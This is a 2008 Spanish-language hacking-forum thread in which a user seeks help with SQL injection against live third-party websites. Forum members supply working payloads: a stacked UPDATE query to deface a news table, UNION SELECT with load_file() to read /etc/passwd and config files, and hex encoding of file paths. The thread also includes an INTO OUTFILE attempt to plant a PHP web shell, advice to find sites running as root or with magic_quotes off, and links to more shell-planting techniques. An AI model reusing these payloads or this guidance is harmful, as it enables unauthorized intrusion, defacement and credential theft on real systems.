elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Sql injection! Ayuda con esto!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Sql injection! Ayuda con esto!  (Leído 4,450 veces)
[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Sql injection! Ayuda con esto!
« en: 5 Diciembre 2008, 17:18 pm »

http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre
En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Sql injection! Ayuda con esto!
« Respuesta #1 en: 5 Diciembre 2008, 21:17 pm »

Hasta donde yo recuerdo no podes hacer ;otrasentencia en sqlinjection =\ tal vez por eso te da el error ñ_ñ

Lo que podrias hacer es sacar info del server, y luego conectarte via remota (si es posible) o meter una shell (tambien si es posible) o sacar los datos del login de administracion del sistema =\
En línea

ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #2 en: 6 Diciembre 2008, 00:31 am »

hola,

no creo que puedas lograr eso. Lo primero seria sacar datos de la base de datos con UNION SELECT y ver analizando si hay una tabla de passwords. Ademas reconoce que sistema e intenta volcar los contenidos de ficheros importantes, tal vez config.php o /etc/passwd con la función load_file()

saludos,
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #3 en: 10 Diciembre 2008, 19:12 pm »

Buen gracias por las respuesta! Estoy tratando de usera el load_file()  para ver que pasa gracias.

http://www.victima.com/noticias.php?id=1%20union%20select%201,2,3,load_file(concat(char(0x22)%2bchar(0x69)%2bchar(0x6e)%2bchar(0x64)%2bchar(0x65)%2bchar(0x78)%2bchar(0x2e)%2bchar(0x70)%2bchar(0x68)%2bchar(0x70)%2bchar(0x22))),5,6,7%20from%20noticias/*

No me da error pero tampocomo me muesta los datos me puede explicar porue no muestra los datos!
« Última modificación: 10 Diciembre 2008, 19:43 pm por [{O_o}] » En línea

Teddy Picker

Desconectado Desconectado

Mensajes: 95


"... En cambio deseo el cielo"


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #4 en: 11 Diciembre 2008, 03:16 am »

Si, si eso esta bien... pero porque tienes que usar todos esos caracateres en concat???  :-\

Simplemente puedes juntar la notacion hexadecimal de cada caracter de "/etc/passwd"

Código:
0x2f6574632f706173737764

Asi quedaria:

Código:
load_file(0x2f6574632f706173737764)

 :laugh: :laugh: :laugh:
En línea

ChElAnO

Desconectado Desconectado

Mensajes: 129


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #5 en: 11 Diciembre 2008, 05:32 am »


es posible que el usuario de myql que está ejecutra los scripts web no tenga los privilegios FILE para poder leer archivos. Intenta con union select user() para saber el usuario.

cuenta como vas,

saludos
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #6 en: 11 Diciembre 2008, 15:05 pm »

gracias por la ayuda el usuario que genera es este estrella_dbuser@localhost pero de igual manera no me deja ver los archivos! no tiene permisos!

Pero tambien encontre otra web esta ves el user es root@localhost perfecto!
Ya puedo leer los archivos y todo pero no puedo crear un archivo usando INTO OUTFILE
creo que el problema esta en las comilla me puede alguien decir como se hace el INTO OUTFILE  o un buen manual.

UNION SELECT 1,'<?php system($_GET['cmd']); ?>',3,4,5,6 INTO OUTFILE '/text.php'/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\',3,4,5,6 INTO OUTFILE \'/text.php\'/*' at line 1

gracias por adelantado!
« Última modificación: 11 Diciembre 2008, 16:27 pm por [{O_o}] » En línea

Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.188


>.<


Ver Perfil WWW
Re: Sql injection! Ayuda con esto!
« Respuesta #7 en: 11 Diciembre 2008, 16:34 pm »

es que tiene magic_quotes activado, y este si que no lo saltas, el "into dumpfile" y el "into outfile" siempre ocupa las comillas y sin este no funciona =\

mas abajo encontraras esa misma duda
foro.elhacker.net/bugs_y_exploits/como_hacer_into_outfile_si_tengo_magicquotes-t234737.0.html

y poco mas abajo encontraras otras formas de meter shell ñ_ñ

foro.elhacker.net/bugs_y_exploits/web_vulnerabilities_to_gain_access_to_the_system-t231238.0.html

y aun asi a veces no encuentro la forma de meter shell xDDD
En línea

[{O_o}]

Desconectado Desconectado

Mensajes: 53


Ver Perfil
Re: Sql injection! Ayuda con esto!
« Respuesta #8 en: 11 Diciembre 2008, 17:03 pm »

Pues gracias Azielito y a los demas entonces tendre que buscar una web q tenga el magic quote off
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Es esto suficiente para evitar SQL Injection?
Nivel Web
cybero 3 3,442 Último mensaje 30 Abril 2012, 12:58 pm
por cybero
Necesito ayuda con esto de el sql injection
Hacking
Lino Romero 4 3,212 Último mensaje 8 Septiembre 2019, 00:34 am
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines